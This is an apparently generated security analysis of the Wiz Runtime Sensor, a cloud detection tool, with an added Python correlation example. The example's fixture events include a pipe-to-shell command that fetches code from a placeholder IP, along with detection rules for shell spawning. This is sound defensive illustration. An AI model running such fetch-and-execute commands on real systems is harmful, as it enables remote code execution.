Full Report
Today we are excited to announce the Wiz Runtime Sensor. The sensor collects signals in real-time from the workload runtime to simplify threat detection and response in the cloud as part of our Cloud Detection and Response (CDR) capabilities.
Analysis Summary
# Tool/Technique: Wiz Runtime Sensor
## Overview
The Wiz Runtime Sensor is a lightweight, eBPF-based component designed to collect workload runtime signals (network use, processes, memory use) specifically for cloud-native environments, integrating these signals with the broader context provided by the Wiz Security Graph for enhanced Cloud Detection and Response (CDR).
## Technical Details
- Type: Tool/Component (Part of the Wiz Cloud Security Platform)
- Platform: Cloud workloads (VMs, Containers, Serverless, PaaS environments)
- Capabilities: Collects real-time runtime signals, integrates with existing agentless posture data, designed for ephemeral workloads.
- First Seen: Not stated on the page; announced as part of the Wiz Cloud Detection and Response (CDR) capabilities.
## MITRE ATT&CK Mapping
*Note: since this is a detection/response tool, its purpose is to detect techniques, not execute them. The page gives no ATT&CK mapping of its own; the entries below are inferred from the signals the sensor gathers (process, network, memory) and are illustrative, not a vendor-stated coverage list.*
- [TA0009 - Collection]
- [T1005 - Data from Local System] (Detection via process/memory analysis)
- [TA0007 - Discovery]
- [T1016 - System Network Configuration Discovery] (Detection via network use signals)
- [TA0003 - Persistence]
- [T1543 - Create or Modify System Process] (Detection via process creation monitoring)
## Functionality
### Core Capabilities
- Collects true runtime signals (network usage, processes, memory utilization) via eBPF. Because eBPF programs are loaded into the Linux kernel, this requires a workload where the sensor can reach the kernel; coverage of fully managed serverless or PaaS runtimes depends on what the provider exposes.
- Remains lightweight by relying primarily on agentless scanning for posture and vulnerability data.
- Designed specifically for cloud-native, short-lived workloads (e.g., containers).
### Advanced Features
- **Breaking Silos:** Integrates workload signals with cloud/Kubernetes events and the Wiz Security Graph context to trace attacker movement across cloud layers.
- **Contextual Prioritization:** Enables high-fidelity prioritization of threats, such as correlating a suspicious process on a privileged machine with access to sensitive data buckets.
- **Ephemeral Workload Association:** Accurately associates runtime detections with specific, short-lived cloud resources (e.g., Kubernetes Deployments).
- **Extensibility:** Can consume signals from existing EDR and runtime solutions.
## Indicators of Compromise
Detection relies on correlating the runtime signals collected by the sensor with existing cloud context.
- File Hashes: N/A (The sensor is a deployment component, not malware)
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: None published. The sensor records outbound connections from workloads, which the analysis layer can flag as possible C2 or exfiltration when they fall outside the expected behaviour of that workload; the page lists no concrete domains or IPs.
- Behavioral Indicators:
- Suspicious process execution on cloud workloads.
- Unusual network activity originating from containers or ephemeral functions.
- Memory access patterns indicative of compromise.
## Associated Threat Actors
None. This is a defensive (blue-team) component used by security and development teams to implement CDR in cloud environments; it is not attributed to or used by any threat actor.
## Detection Methods
Detection is achieved through the Wiz CDR analysis layer that consumes the sensor data within the Wiz Security Graph context.
- Signature-based detection: Not described on the page; the emphasis is on behavioural detection enriched with cloud context rather than static signatures.
- Behavioral detection: High-fidelity detection based on correlating runtime behavior (process, network) with known cloud asset inventory and configuration risks.
- YARA rules: Not explicitly mentioned.
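To make the correlation described under "Contextual Prioritization", "Ephemeral Workload Association" and "Behavioral detection" concrete, here is an added example (not Wiz code, and not the sensor's real event schema) that takes a constructed stream of runtime events (process executions and outbound connections, each tagged with the pod it came from) plus a constructed Kubernetes/cloud inventory, flags suspicious behaviour, and then resolves each hit to its Deployment and to the buckets its service account can reach before assigning a severity. All pod, deployment, service-account and bucket names, the egress allowlist and the event field names are hypothetical. The point it shows beyond the text: the same Deployment appearing as two different pod names (a restart) collapses into one finding, and an identical shell-spawn on a workload without access to sensitive data is prioritised lower.

```python
"""Toy correlation of runtime sensor events with cloud/Kubernetes context.

Added example; the event format and inventory layout are assumed for
illustration and are not the Wiz Runtime Sensor's schema.
"""
import ipaddress
from dataclasses import dataclass, field

# Constructed inventory (hypothetical names): pod -> Deployment and service
# account; service account -> IAM role and the buckets it can read.
INVENTORY = {
    "pods": {
        "api-7c9d4-x1k2z": {"namespace": "prod", "deployment": "api", "service_account": "api-sa"},
        "api-7c9d4-m3n4p": {"namespace": "prod", "deployment": "api", "service_account": "api-sa"},
        "batch-5f6a1-q9r8s": {"namespace": "prod", "deployment": "batch", "service_account": "batch-sa"},
    },
    "service_accounts": {
        "api-sa": {"iam_role": "api-role", "buckets": ["customer-pii", "static-assets"]},
        "batch-sa": {"iam_role": "batch-role", "buckets": ["static-assets"]},
    },
    "sensitive_buckets": {"customer-pii"},
}
EGRESS_ALLOWLIST = [ipaddress.ip_network("10.0.0.0/8")]  # assumed internal range
SHELLS = {"sh", "bash", "dash", "zsh"}
RUNTIME_PARENTS = {"runc", "containerd-shim", "containerd-shim-runc-v2"}

# Constructed sensor events (hypothetical schema).
EVENTS = [
    {"ts": 1, "pod": "api-7c9d4-x1k2z", "type": "process", "comm": "node", "parent": "runc",
     "argv": ["node", "server.js"]},
    {"ts": 2, "pod": "api-7c9d4-x1k2z", "type": "process", "comm": "bash", "parent": "node",
     "argv": ["bash", "-c", "curl -s http://203.0.113.9/x | sh"]},
    {"ts": 3, "pod": "api-7c9d4-x1k2z", "type": "connect", "dst": "203.0.113.9", "dport": 80},
    # Same Deployment, different pod name after a restart: must merge into one finding.
    {"ts": 4, "pod": "api-7c9d4-m3n4p", "type": "connect", "dst": "203.0.113.9", "dport": 443},
    {"ts": 5, "pod": "batch-5f6a1-q9r8s", "type": "process", "comm": "sh", "parent": "python3",
     "argv": ["sh", "-c", "id"]},
    {"ts": 6, "pod": "batch-5f6a1-q9r8s", "type": "connect", "dst": "10.0.3.4", "dport": 5432},
]


def suspicious_process(ev):
    """Flag shells spawned by application code and pipe-to-shell execution."""
    cmd = " ".join(ev["argv"])
    if ev["comm"] in SHELLS and ev["parent"] not in SHELLS | RUNTIME_PARENTS:
        return f"shell {ev['comm']} spawned by {ev['parent']}: {cmd}"
    if "| sh" in cmd or "| bash" in cmd:
        return f"pipe-to-shell execution: {cmd}"
    return None


def suspicious_connect(ev):
    """Flag egress to destinations outside the assumed internal allowlist."""
    dst = ipaddress.ip_address(ev["dst"])
    if any(dst in net for net in EGRESS_ALLOWLIST):
        return None
    return f"egress to unexpected destination {ev['dst']}:{ev['dport']}"


@dataclass
class Finding:
    namespace: str
    deployment: str
    pods: set = field(default_factory=set)
    reasons: list = field(default_factory=list)
    sensitive_buckets: list = field(default_factory=list)
    severity: str = "low"


def prioritize(f):
    """Raise severity when the workload's identity can reach sensitive data."""
    if f.sensitive_buckets and len(f.reasons) >= 2:
        return "critical"
    if f.sensitive_buckets:
        return "high"
    return "medium"


def correlate(events, inv):
    """Group suspicious events by Deployment (not pod) and enrich with cloud context."""
    findings = {}
    for ev in events:
        reason = suspicious_process(ev) if ev["type"] == "process" else suspicious_connect(ev)
        if reason is None:
            continue
        # Pods that already vanished from inventory are kept, just unattributed.
        pod = inv["pods"].get(ev["pod"], {"namespace": "?", "deployment": "?", "service_account": None})
        key = f"{pod['namespace']}/{pod['deployment']}"
        f = findings.setdefault(key, Finding(pod["namespace"], pod["deployment"]))
        f.pods.add(ev["pod"])
        f.reasons.append(reason)
        sa = inv["service_accounts"].get(pod["service_account"], {})
        f.sensitive_buckets = sorted(set(sa.get("buckets", [])) & inv["sensitive_buckets"])
    for f in findings.values():
        f.severity = prioritize(f)
    return findings


if __name__ == "__main__":
    for key, f in correlate(EVENTS, INVENTORY).items():
        print(f"{f.severity:8} {key} pods={sorted(f.pods)} buckets={f.sensitive_buckets}")
        for r in f.reasons:
            print("   -", r)
```

With the constructed input, `prod/api` collapses two pod names into one critical finding (shell spawned by the app, pipe-to-shell, and egress to an unexpected host, on an identity that can read `customer-pii`), while the shell spawned inside `prod/batch` stays a medium finding because its service account reaches nothing sensitive. In a real deployment the inventory would come from the Kubernetes API and the cloud IAM graph, and the allowlist from observed baseline egress rather than a fixed range.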
## Mitigation Strategies
The tool itself is a mitigation/response layer built upon successful posture management.
- Prevention measures: Maintain strong cloud posture management (Wiz's agentless scanning).
- Hardening recommendations: Use the CDR capabilities to quickly identify and isolate compromised ephemeral workloads, which traditional host-based EDR agents are poorly suited to cover because the workload may be gone before an agent is installed or an alert is triaged.
## Related Tools/Techniques
- Wiz Security Graph (Provides context).
- Agentless Cloud Security Posture Management (CSPM) scanning (Provides baseline context).
- Existing EDR/Runtime solutions (Signals can be integrated).